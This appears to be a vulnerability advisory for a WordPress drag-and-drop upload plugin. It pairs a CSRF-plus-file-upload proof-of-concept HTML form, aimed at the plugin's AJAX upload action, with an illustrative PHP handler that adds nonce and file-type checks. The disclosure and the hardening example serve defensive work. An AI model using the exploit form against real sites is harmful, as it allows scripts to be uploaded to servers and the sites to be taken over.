The plugin was affected by Non-Arbitrary File Upload and Cross-Site Request Forgery (CSRF) vulnerabilities. Together, the two vulnerabilities allow us to upload files to the server, even with a script.
Proof of Concept
exploit.html file:
<form method="post" action="https://lana.solutions/vdb/contact-form-7/wp-admin/admin-ajax.php" enctype="multipart/form-data">
<input type="hidden" name="action" value="dnd_codedropz_upload">
<input type="file" name="upload-file">
<input type="submit">
</form>
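For comparison, a WordPress AJAX upload handler that would reject the form above, as an added example that is not the plugin's own code or its actual patch. Only the action name `dnd_codedropz_upload` and the field name `upload-file` come from the PoC; the function name, nonce action, `security` field, allowlist and the logged-in-only registration are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Hypothetical names: example_dnd_upload,
// example_dnd_upload_nonce, the "security" field and the allowlist below.
// Assumption: the handler is registered for logged-in users only.
add_action( 'wp_ajax_dnd_codedropz_upload', 'example_dnd_upload' );

function example_dnd_upload() {
    // CSRF check: the legitimate form embeds wp_create_nonce( 'example_dnd_upload_nonce' )
    // in a "security" field. A form hosted on another origin cannot read that
    // value, so a request like the PoC's arrives without it and is refused.
    if ( ! check_ajax_referer( 'example_dnd_upload_nonce', 'security', false ) ) {
        wp_send_json_error( 'Invalid or missing nonce.', 403 );
    }

    if ( empty( $_FILES['upload-file'] ) || UPLOAD_ERR_OK !== $_FILES['upload-file']['error'] ) {
        wp_send_json_error( 'No file received.', 400 );
    }
    $file = $_FILES['upload-file'];

    // Upload check: explicit allowlist in WordPress's extension => MIME format.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'pdf'      => 'application/pdf',
    );

    // Validates the extension against the allowlist and, where PHP can detect it,
    // the real content type of the temporary file, so a renamed script fails.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( 'File type not allowed.', 415 );
    }

    // wp_handle_upload() re-applies the same allowlist and picks a safe, unique name.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload( $file, array( 'test_form' => false, 'mimes' => $allowed ) );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( $result['error'], 400 );
    }

    wp_send_json_success( array( 'url' => $result['url'] ) );
}
```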